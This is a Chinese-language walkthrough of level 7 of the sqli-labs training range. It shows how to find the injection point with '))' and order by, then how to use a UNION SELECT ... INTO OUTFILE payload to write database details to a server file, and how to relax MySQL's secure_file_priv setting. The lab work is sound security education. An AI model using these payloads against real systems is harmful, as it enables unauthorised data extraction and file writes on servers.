sqli-labs 靶场 less-7 第七关详解:OUTFILE注入与配置

复制代码
SQLi-Labs是一个用于学习和练习SQL注入漏洞的开源应用程序。通过它,我们可以学习如何识别和利用不同类型的SQL注入漏洞,并了解如何修复和防范这些漏洞。

Less 7

复制代码
SQLI DUMB SERIES-7

判断注入点

进入页面中,并输入数据查看结果。

发现空数据提示语法问题

输入单引号会提示语法问题。

经尝试竟然还需要两个括号才能显示正常。整个过程都没有错误提示或数据显示,那我们只能使用布尔注入来测试了。

只有列号为3的时候,才能正常显示,则字段长度为3。

sql 复制代码
http://sqli-labs.com/Less-7/
?id=1')) order by 3 --+

注入

复制代码
SELECT column1 FROM table_name INTO OUTFILE 'file_path'
OUTFILE命令可以将查询结果导出为文本文件,CSV文件等多种格式。
注意:使用这个功能需要提前开启权限。你可以前往MySQL的源文件目录中,
	打开my.ini配置文件,并修改其中的`secure_file_priv='D://'`
	参数设置为你的安全目录。(请设置为C盘以外的磁盘,避免系统权限问题。)
	修改完成并重启后在MySQL命令行中输入`show variables like '%secure%';`查看是否设置成功。

根据页面的提示我们也可以采用outfile的方式进行注入:

c 复制代码
http://sqli-labs.com/Less-7/
?id=1')) union select database(),version(),user() from dual into outfile "d:\\project\\sqli-labs-master\\Less-7\\1.txt" --+
sql 复制代码
SELECT * FROM users WHERE id=(('id=1')) union select version(),database(),user() into outfile "D:\\project\\sqli-labs-master\\Less-7\\1.txt";

打开文件看一下效果:

至此,注入成功。

系列文章

相关推荐
前端小巷子2 分钟前
浏览器的渲染流程:从 HTML 到屏幕显示
前端·javascript·面试
不想说话的麋鹿12 分钟前
《NestJS 实战:RBAC 系统管理模块开发 (二)》:菜单与权限路由设计
前端·node.js·全栈
智驱力人工智能12 分钟前
雨季智慧交通:从车辆盲区到客流统计的算法全覆盖
人工智能·科技·算法·安全·智慧城市·智慧交通·渣土车识别
前端流一12 分钟前
Babel的JSX转化插件--详解
前端
SynthWriter13 分钟前
从固定到弹性:实战Vue组件多分辨率适配全解析
前端·css
sunbyte16 分钟前
50天50个小项目 (Vue3 + Tailwindcss V4) ✨ | EventKey Codes(键盘码)
前端·javascript·css·vue.js·vue
Avan_菜菜18 分钟前
Nuxt3 中使用 pnpm 安装的 NuxtImg 使用会提示找不到图片
前端·npm·nuxt.js
蟑螂学前端18 分钟前
vue3结合拖拽组件draggable-next与element-plus实现组件拖拽效果
前端
snakeshe101020 分钟前
重构迷你React:引入wipRoot与协调子节点优化
前端
恋猫de小郭21 分钟前
iOS 26 beta1 重新禁止 JIT 执行,Flutter 下的 iOS 真机 hot load 暂时无法使用
android·前端·flutter